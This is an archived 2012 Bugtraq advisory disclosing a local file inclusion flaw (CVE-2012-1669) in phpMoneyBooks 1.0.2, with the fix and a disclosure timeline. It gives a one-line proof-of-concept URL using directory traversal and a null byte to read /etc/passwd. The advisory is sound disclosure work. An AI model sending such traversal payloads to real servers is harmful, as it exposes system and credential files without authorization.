[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
From: Mark Stanislav <mark.stanislav@xxxxxxxxx>
Date: Thu, 22 Mar 2012 10:38:01 -0400

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanislav@xxxxxxxxx


I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows
for local file inclusion using a null-byte attack on the 'module' GET
parameter.


II. TESTED VERSION
---------------------------------------
1.0.2


III. PoC EXPLOIT
---------------------------------------
http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00


IV. NOTES
---------------------------------------
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for
null-byte attacks to work


V. SOLUTION
---------------------------------------
Upgrade to 1.0.3 or above.


VI. REFERENCES
---------------------------------------
http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669


VII. TIMELINE
---------------------------------------
02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure

Prev by Date: 'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670)
Next by Date: [SECURITY] [DSA 2438-1] raptor security update
Previous by thread: 'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670)
Next by thread: [SECURITY] [DSA 2438-1] raptor security update
Index(es):
- Date
- Thread